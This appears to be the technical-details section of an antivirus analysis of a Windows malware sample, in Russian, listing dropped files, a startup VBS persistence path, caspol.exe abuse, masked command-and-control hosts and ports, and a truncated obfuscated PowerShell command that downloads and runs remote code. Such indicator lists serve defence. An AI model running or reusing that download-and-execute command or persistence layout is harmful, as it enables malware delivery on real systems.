Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- %WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\run.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\catalog.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\storage.dat
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bin
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bak
- %APPDATA%\36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee\settings.bak
- 'gi##.###hubusercontent.com':443
- 'xc####.myq-see.com':9955
- DNS ASK gi##.###hubusercontent.com
- DNS ASK xc####.myq-see.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((n`e`W`-Obj`E`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'r'+'i'+'...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\caspol.exe'